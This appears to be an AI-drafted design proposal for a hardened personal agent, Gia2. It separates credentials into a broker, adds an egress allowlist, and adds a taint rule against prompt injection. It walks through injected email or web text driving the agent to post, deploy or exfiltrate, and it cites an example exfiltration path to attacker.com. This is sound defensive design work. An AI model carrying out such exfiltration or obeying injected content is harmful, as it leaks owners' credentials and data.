Gia2: the hardened super-agent (proposal)

_2026-10-02 · status: proposal, nothing built yet · stack dir (planned): ~/openclaw-gia2_

TL;DR

  1. OpenClaw Enterprise (OCE) is real, but it's the wrong base for Gia2 today. It's a Kubernetes control plane for fleets of agents, not a hardened gateway. It's pre-1.0 with no tagged release, and its only documented channel is Slack. It has no Telegram, WhatsApp, SMS, Gmail, or voice. Sources: OCE announcement, OCE README, security model.
  2. Gia2 gets the security benefits OCE provides, but on the platform that actually runs our channels. That means the new extended-stable gateway openclaw@2026.8.34 (released 2026-10-01: 113 backported fixes, all advisories against 2026.8.2 reconciled), plus OCE's core idea enforced at a container boundary, not just in policy: the agent that reads untrusted email/web holds no credentials. A separate deterministic broker holds them and only performs narrow, approved actions.
  3. Gia2 = everything Gia has, plus WhatsApp, voice calls, slog, and Office docs, with a far smaller blast radius than Gia. It runs in shadow first, then takes over from Gia one channel at a time, each step with its own rollback. Two agents can't share one Telegram bot, the WhatsApp session, or the SMS/email crons.

1. What OpenClaw Enterprise actually is

OpenClaw EnterpriseWhat Gia2 needs
Who ships itOfficial OpenClaw Foundation (began inside OpenAI; Red Hat + NVIDIA co-develop), MIT, free (blog, Techzine)
MaturityPre-1.0, "internal pilot workloads", no releases/tags, main branch only (repo)Production, daily-driver
Runtimek3d / Kubernetes + Helm; Compose mode is a preview that cannot deploy agents (README)Colima/Docker on the Mini
ChannelsSlack (+ GitHub)Telegram, WhatsApp, Twilio SMS/voice, Gmail, LinkedIn
PluginsEmbedded OpenClaw ships only the bundled "Diffs" plugin~50 Gia skills + gog, Chatterbox, browser
SandboxOpenShell driver, "not supported for production" (sandbox doc)
First-agent modelRequires an OpenAI keyClaude-first fleet

Watch out: the npm name openclaw-enterprise belonged to a squatter, who published it and pulled it the same day (registry). OCE is not on npm, so never npm install openclaw-enterprise. The other "enterprise OpenClaw" people mean is NVIDIA NemoClaw, a vendor sandbox wrapper. We already tried and parked a NemoClaw agent.

What we borrow from OCE: secrets separated from config, per-agent identity that doesn't inherit its creator's rights, default-deny egress, plugins that start empty and get approved one by one, immutable revisions (config changes go through a rebuild, not live edits), and redacted audit events.

Revisit OCE when 1.0 ships and it has Telegram/SMS channels.

2. Today's baseline, and why Gia2 should exist

Gia is the most capable agent: Opus-first model chain, ~50 skills, ~19 crons, and the only agent with Gmail, LinkedIn, the voice clone, deploy tokens, and the host Claude bridge. It's also the largest blast radius in the fleet:

AreaGap vs. what Gia2 should have
VersionTwo release lines behind the current security rollups (releases)
Command executionBroad, without per-command approval or a sandbox
Tool surfaceNo explicit allowlist
CredentialsHeld in the same process that reads untrusted email and web content
Host accessA general-purpose bridge to the host
Health2 scheduled jobs failing silently

Similar fleet-wide hygiene items (other agents) are tracked privately and fixed in Phase 3.

3. Capability matrix: what Gia2 gets

Every row is marked as Inherit (copied from Gia), Port (from another agent), New (must be built), or Not real (doesn't exist anywhere yet).

CapabilitySourceGia2 plan
Telegram (DM pairing + group allowlist)Inherit (Gia)Shadow: new test bot. Cutover: take over Gia's bot token
Twilio SMS out + inbound relayInherit (Gia sms/, ~/ops/bin/txt)Outbound in shadow; inbound relay cron moves at cutover only
WhatsAppPort (Mia channels.whatsapp)Re-pair by QR at cutover (needs Byron's phone); Mia's WhatsApp goes off at the same moment
Email (both Gmail accounts)Inherit (gog in the image, keyring in credentials volume)Read in shadow; sending gated by approval
LinkedIn posting + DMsInherit (token + Playwright session, auto-renew daemon)Posting gated by approval, wc -c < 3000 check kept
Byron's voice (Chatterbox clone)Inherit (clone skill → ~/voice-clone, never ElevenLabs)Same bridge, scoped key (see §4)
Podcast/standup TTS, Signal Talk steeringInheritMoves at cutover (`[Gia\Model]` tag format kept so Signal Talk still parses it)
Presentations (reveal.js → presentations.arnao.ai)Inherit (presentation-builder)Same
PowerPoint / Word / PDF / Excel filesNewInstall the pptx/docx/pdf/xlsx skills (~/.claude/skills/synced) into Gia2 after a skill-scan
Images (Gemini 3 Pro image, grok-imagine, nano-banana-pro)Inherit + Port (Mia's nano-banana-pro)Merge into one image skill
Voice phone calls (Twilio)NewEnable the built-in voice-call skill (disabled on Gia): outbound only, owner number allowlisted, voice = clone
slog work logNew as first-classWrapper script + skill doc so Gia2 logs outcomes like Claude Code does
Deploys (Vercel, GoDaddy DNS, Cloudflare)InheritBehind approval; tokens via SecretRef/file
Host Claude Code (dispatch, fable-critique, proposal-publish, vercel-deploy)Inherit (SSH bridge)Same, but forced-command key (§4)
Model chain (Opus-first, Fable sub-agent, fallbacks)InheritSame, managed by set-best-claude.sh; maxTokens set per model (the known Gia break from June)
Crons (19)InheritMoved at cutover; the 2 failing ones fixed first, not ported broken
Skills (~50) + fleet-skills manifestInheritEach passes skill-scan; relay-message (lost content) dropped
Signal messengerNot realNothing in the fleet speaks Signal (in our setup "Signal" is the podcast brand). Possible later via signal-cli, but out of scope unless you want it

4. Security design: two containers, egress proxy, taint rule

_Revised after the adversarial pass (see the Self-critique section). The first draft put allowlists inside one container. The critique showed most of that was theater: an agent that can cat its own SecretRef files, write a script into its allowlisted folder, or post through a logged-in browser has no real boundary._

The core risk: Gia2 reads attacker-controlled text (email, web, inbound SMS, group chats) in the same process that holds Gmail, LinkedIn, Twilio, deploy keys, and a host shell. The design separates those.

 Telegram / WhatsApp / SMS-in / Gmail-read / web
                │
     ┌──────────▼───────────┐   internal-only network    ┌────────────────────────┐
     │ gia2  (OpenClaw LLM) │ ─────── narrow verbs ─────▶ │ gia2-broker (no LLM)   │──▶ Gmail send, LinkedIn,
     │ no credentials volume│                             │ holds every credential │    Twilio SMS/call, Vercel,
     │ no logged-in browser │                             │ renders approval tap   │    GoDaddy, host jobs
     └──────────┬───────────┘                             │ rate-limits + slog     │
                │ only route out                          └────────────────────────┘
     ┌──────────▼───────────┐
     │ gia2-egress (proxy)  │  domain allowlist: Anthropic, OpenAI, Google, Telegram,
     └──────────────────────┘  WhatsApp, Brave search, *.arnao.ai
  1. Patched base. openclaw@2026.8.34 extended-stable (the gateway-only LTS line with critical security backports). The 180s→480s compaction sed hack becomes the real config key agents.defaults.compaction.timeoutSeconds: 480 (verified in the 2026.8.34 source).
  2. The agent container holds no write credentials. It keeps only its model API keys (as SecretRef files: models.providers.*.apiKey and channels.telegram.botToken are supported, verified in the package's docs/reference/secretref-credential-surface.md), behind a monthly spend cap. Gmail send, LinkedIn, Twilio, Vercel, GoDaddy, Cloudflare, the database URL, and the host SSH key live only in the broker. Read-only Gmail uses a separate read-scoped gog token. A compromised agent can read the mail it was already reading, and nothing more.
  3. Broker = small deterministic service, not an LLM. It exposes fixed verbs: email.reply{thread_id, body}, email.send{to, subject, body}, linkedin.post{text}, sms.send{to, body}, call.place{to, script}, deploy{project}, voice.clone{text}, host.job{name, args}, slog{…}. It builds the Telegram approval card itself from the structured arguments, so the LLM never writes the text Byron approves. Per-verb policy: auto (voice clip, slog, SMS/call to Byron's own number), tap-to-approve (email, LinkedIn, deploy, calls/SMS to anyone else), never. Rate limits per verb. Every action is logged to slog.
  4. Real egress control. This is doable on Colima. Gia2 sits on an internal: true Docker network whose only exit is a proxy container (smokescreen or squid) with a domain allowlist. That closes the "web_fetch attacker.com/?k=…" and curl exfiltration paths. The message tool is pinned to Byron's chats plus the paired-peer allowlist.
  5. Taint rule. Any turn that has read external content (email, web page, inbound SMS, group message) can only propose broker actions, and every proposal needs a tap, even verbs that are normally auto. Only Byron's own direct messages can trigger auto verbs. This blocks the main path: an injected email that tries to post on LinkedIn or deploy.
  1. No free-text host shell. dispatch-to-claude becomes host.job{name}: a fixed menu of templated jobs (fable-critique on a file, proposal-publish, vercel-deploy of a named project, clone-voice) run by a forced-command SSH key in the broker, with Claude Code started in restricted-permission mode. Free-text "ask host Claude anything" stays a Byron-only, tap-approved verb.
  2. Browser. The logged-in LinkedIn and Playwright profile moves to the broker (used only by linkedin.post). The agent's browser is a fresh, logged-out profile that goes through the egress proxy.
  3. Container hygiene. Runs as node, no docker.sock, cap_drop: ALL, read-only root filesystem, explicit tools.allow and plugins.allow, and every imported skill passes skill-scan (no ClawHub auto-installs).
  4. Immutable revisions. Config lives in Gitea (byron/gia2-config), and changes deploy as a tagged rebuild, never as a live edit inside the container.
  5. Audit. diagnostics-otel → Prometheus/Grafana, and broker actions → slog.

Honest limit: a prompt-injected Gia2 can still read everything in its own context and send it to Byron, or propose a harmful action that Byron could approve by mistake. The approval card shows exactly what will be sent and to whom, to make that hard.

5. Build plan

Phase 0: prep (≈1h, no impact on Gia)

Phase 1: build + shadow (≈3 days of work, spread over about a week)

Phase 2: cutover, one channel at a time (each step reversible on its own)

  1. Telegram: docker compose down Gia (not just stop; check restart: policy and that no webhook is set) → Gia2 takes Gia's bot token. Rollback: reverse the token.
  2. Crons, in groups (reports/podcasts → SMS relay → email monitor → Signal Talk), each disabled on Gia before it's enabled on Gia2. Cron state is snapshotted first, so rollback restores Gia's exact state.
  3. Email send + LinkedIn: move the gog send token and LinkedIn session/renew daemon to the broker. One owner at any moment.
  4. WhatsApp: QR pairing (needs Byron's phone). This step is last because rolling it back also needs the phone. Mia's WhatsApp channel goes off.
  5. Point command.arnao.ai at 18808.

Phase 3: register + clean up

6. Decisions for Byron

  1. Approve the plan: build Gia2 on extended-stable 2026.8.34 now, revisit OCE at 1.0.
  2. Replace or coexist? I recommend replace: Gia2 takes over Gia's channels and crons at cutover. Coexisting means two bots and split crons forever.
  3. Approval strictness. Default: email, LinkedIn, deploys, and calls/SMS to anyone but you each need a Telegram tap; tainted turns always need one. Should anything be auto (e.g. replies within an existing email thread you started)?
  4. Signal messenger: skip, or add later via signal-cli?
  5. Effort. The broker and egress design adds ~2 days over a straight clone of Gia. I think it's the whole point of Gia2. The alternative is "Gia on a patched version", which takes ~2 hours and fixes the CVEs but not the blast radius.

Self-critique (adversarial pass)

_The scripted Fable API pass was blocked this session: the auto-mode safety check refused to read the Anthropic key out of Gia's container. This pass was run as an adversarial Claude review of the first draft instead._

What it found (accepted):

Also accepted: the optional OCE k3d pilot was busywork, so it is dropped.